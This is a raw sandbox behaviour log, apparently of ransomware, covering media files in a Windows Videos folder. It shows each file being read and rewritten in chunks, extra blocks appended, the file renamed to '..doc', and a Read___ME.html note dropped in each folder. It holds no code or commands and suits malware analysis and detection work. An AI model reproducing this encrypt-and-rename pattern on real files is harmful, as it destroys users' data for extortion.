File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\qopWQzK.mkv, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\qopWQzK.mkv, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\qopWQzK.mkv..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\u-MJrV.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\u-MJrV.swf, type = size, size_out = 24312	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\u-MJrV.swf, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\u-MJrV.swf, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\u-MJrV.swf, size = 8192, size_out = 7928	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\u-MJrV.swf, size = 7936	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\u-MJrV.swf, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\u-MJrV.swf, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\u-MJrV.swf, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\u-MJrV.swf, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\u-MJrV.swf, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\u-MJrV.swf..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\JNgBvbxt2TE.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\JNgBvbxt2TE.flv, type = size, size_out = 82996	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\JNgBvbxt2TE.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\JNgBvbxt2TE.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\JNgBvbxt2TE.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\JNgBvbxt2TE.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\JNgBvbxt2TE.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\JNgBvbxt2TE.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\JNgBvbxt2TE.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\JNgBvbxt2TE.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\JNgBvbxt2TE.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\JNgBvbxt2TE.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\JNgBvbxt2TE.flv, size = 8192, size_out = 1076	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\JNgBvbxt2TE.flv, size = 1088	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\JNgBvbxt2TE.flv, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\JNgBvbxt2TE.flv, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\JNgBvbxt2TE.flv, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\JNgBvbxt2TE.flv, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\JNgBvbxt2TE.flv, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\JNgBvbxt2TE.flv..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\XfNky9jsklLvnZzA0q7K.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\XfNky9jsklLvnZzA0q7K.swf, type = size, size_out = 67025	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\XfNky9jsklLvnZzA0q7K.swf, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\XfNky9jsklLvnZzA0q7K.swf, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\XfNky9jsklLvnZzA0q7K.swf, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\XfNky9jsklLvnZzA0q7K.swf, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\XfNky9jsklLvnZzA0q7K.swf, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\XfNky9jsklLvnZzA0q7K.swf, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\XfNky9jsklLvnZzA0q7K.swf, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\XfNky9jsklLvnZzA0q7K.swf, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\XfNky9jsklLvnZzA0q7K.swf, size = 8192, size_out = 1489	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\XfNky9jsklLvnZzA0q7K.swf, size = 1504	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\XfNky9jsklLvnZzA0q7K.swf, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\XfNky9jsklLvnZzA0q7K.swf, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\XfNky9jsklLvnZzA0q7K.swf, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\XfNky9jsklLvnZzA0q7K.swf, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\XfNky9jsklLvnZzA0q7K.swf, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\XfNky9jsklLvnZzA0q7K.swf..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\wyRSSbqc98w\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\cn620-GsIa4nYYYCofJ5.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\cn620-GsIa4nYYYCofJ5.mkv, type = size, size_out = 62495	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\cn620-GsIa4nYYYCofJ5.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\cn620-GsIa4nYYYCofJ5.mkv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\cn620-GsIa4nYYYCofJ5.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\cn620-GsIa4nYYYCofJ5.mkv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\cn620-GsIa4nYYYCofJ5.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\cn620-GsIa4nYYYCofJ5.mkv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\cn620-GsIa4nYYYCofJ5.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\cn620-GsIa4nYYYCofJ5.mkv, size = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\cn620-GsIa4nYYYCofJ5.mkv, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\cn620-GsIa4nYYYCofJ5.mkv, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\cn620-GsIa4nYYYCofJ5.mkv, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\cn620-GsIa4nYYYCofJ5.mkv, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\cn620-GsIa4nYYYCofJ5.mkv, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\cn620-GsIa4nYYYCofJ5.mkv..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, type = size, size_out = 99372	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, size = 8192, size_out = 1068	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, size = 1072	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\tt_X88h6 PABCl7r-.swf..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\z5nYgQLxCnl5CC-.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\z5nYgQLxCnl5CC-.avi, type = size, size_out = 55454	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\z5nYgQLxCnl5CC-.avi, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\z5nYgQLxCnl5CC-.avi, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\z5nYgQLxCnl5CC-.avi, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\z5nYgQLxCnl5CC-.avi, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\z5nYgQLxCnl5CC-.avi, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\z5nYgQLxCnl5CC-.avi, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\z5nYgQLxCnl5CC-.avi, size = 8192, size_out = 6302	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\z5nYgQLxCnl5CC-.avi, size = 6304	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\z5nYgQLxCnl5CC-.avi, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\z5nYgQLxCnl5CC-.avi, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\z5nYgQLxCnl5CC-.avi, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\z5nYgQLxCnl5CC-.avi, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\z5nYgQLxCnl5CC-.avi, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\z5nYgQLxCnl5CC-.avi..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\4tNMmqDfQUCo23LOg.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\4tNMmqDfQUCo23LOg.avi, type = size, size_out = 68175	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\4tNMmqDfQUCo23LOg.avi, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\4tNMmqDfQUCo23LOg.avi, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\4tNMmqDfQUCo23LOg.avi, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\4tNMmqDfQUCo23LOg.avi, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\4tNMmqDfQUCo23LOg.avi, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\4tNMmqDfQUCo23LOg.avi, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\4tNMmqDfQUCo23LOg.avi, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\4tNMmqDfQUCo23LOg.avi, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\4tNMmqDfQUCo23LOg.avi, size = 8192, size_out = 2639	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\4tNMmqDfQUCo23LOg.avi, size = 2640	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\4tNMmqDfQUCo23LOg.avi, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\4tNMmqDfQUCo23LOg.avi, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\4tNMmqDfQUCo23LOg.avi, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\4tNMmqDfQUCo23LOg.avi, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\4tNMmqDfQUCo23LOg.avi, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\4tNMmqDfQUCo23LOg.avi..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\9JZc.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\9JZc.mp4, type = size, size_out = 10342	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\9JZc.mp4, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\9JZc.mp4, size = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\9JZc.mp4, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\9JZc.mp4, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\9JZc.mp4, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\9JZc.mp4, size = 768	1	Fn Data
